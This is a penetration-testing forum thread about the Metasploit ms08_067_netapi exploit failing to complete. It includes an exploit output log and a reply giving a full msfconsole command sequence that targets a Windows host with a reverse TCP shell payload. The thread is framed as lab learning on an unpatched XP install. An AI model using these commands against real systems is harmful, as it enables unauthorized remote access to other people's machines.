Results 1 to 10 of 10

Thread: Metasploit ms08_067_netapi question

  1. #1
    Junior Member imported_apprentice's Avatar
    Join Date
    Aug 2008
    Posts
    30

    Default Metasploit ms08_067_netapi question

    hey guys i would like to know if you use this exploit and when it gets up to
    Triggering the vulnerability and just stays like that, it isnt frozen nothing happens, should i just wait ? or run it again or try something else ??
    thanks

  2. #2
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by apprentice View Post
    hey guys i would like to know if you use this exploit and when it gets up to
    Triggering the vulnerability and just stays like that, it isnt frozen nothing happens, should i just wait ? or run it again or try something else ??
    thanks
    Why not try all three?
    Furthermore what is your target box? Are you sure that you have met all of the conditions to make the exploit work? What exact commands did you use.
    These are some details that will help us to help you.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  3. #3
    Moderator
    Join Date
    Jan 2010
    Posts
    167

    Default

    Quote Originally Posted by archangel.amael View Post
    Furthermore what is your target box?
    ms08_067 is also quite unstable for some targets like win2k3 server, so you have to play a bit with it.

    m-1-k-3

  4. #4
    Junior Member imported_apprentice's Avatar
    Join Date
    Aug 2008
    Posts
    30

    Default

    thanks for your reply guys, well im using msfgui,when i execute the module i select auto targetting, my payload is windows/shell/reverse_tcp and the RHOST is the ip then i execute it, this is the message on the output box

    20:26:42 - ms08_067_netapi[*] Launching exploit windows/smb/ms08_067_netapi...
    20:26:43 - ms08_067_netapi[*] Started reverse handler on port 4444
    20:26:44 - ms08_067_netapi[*] Automatically detecting the target...
    20:26:47 - ms08_067_netapi[*] Fingerprint: Windows XP Service Pack 3 - lang:English
    20:26:47 - ms08_067_netapi[*] Selected Target: Windows XP SP3 English (NX)
    20:26:47 - ms08_067_netapi[*] Triggering the vulnerability..

    i guess maybe i watched to many tuts and follow what they are doing instead of why they are doing it, any guidence will be appreciated

  5. #5
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    Loose the gui, grab an unpatched xp install then do like so. Assuming 192.168.1.100 is the box and 192.168.200 is you with port 9999 open.

    ./msfconsole
    use windows/smb/ms08_067_netapi
    set rhost 192.168.1.100
    set payload windows/shell_reverse_tcp
    set lhost 192.168.1.200
    set lport 9999
    exploit

    enjoy!

    @m-1-k-3
    actually this is one of the most stable exploits
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  6. #6
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by m-1-k-3 View Post
    ms08_067 is also quite unstable for some targets like win2k3 server, so you have to play a bit with it.

    m-1-k-3
    Actually I used win2k3 the first time I followed the tutorial here on using the above. Maybe it was luck or whatever but I didn't have any problems with it at all.

    @OP there is a guide here by pureh@te on messing around with this exploit.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #7
    Junior Member imported_apprentice's Avatar
    Join Date
    Aug 2008
    Posts
    30

    Default

    thanks i will give it a go, should i change the default port to 9999 even if that port is not open, do you use windows/shell_reverse_tcp or windows/shell/reverse_tcp as the paylod ? thanks

  8. #8
    Moderator
    Join Date
    Jan 2010
    Posts
    167

    Default

    Quote Originally Posted by vvpalin View Post
    @m-1-k-3
    actually this is one of the most stable exploits
    have you checked it out on win2k3 server?

    m-1-k-3

  9. #9
    Moderator
    Join Date
    Jan 2010
    Posts
    167

    Default

    Quote Originally Posted by archangel.amael View Post
    Actually I used win2k3 the first time I followed the tutorial here on using the above. Maybe it was luck or whatever but I didn't have any problems with it at all.
    if you have a win2k3 server with NX you will get problems, without NX it is working quite smooth ...

    m-1-k-3

  10. #10
    Junior Member imported_apprentice's Avatar
    Join Date
    Aug 2008
    Posts
    30

    Default

    ok thanks will give it ago

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •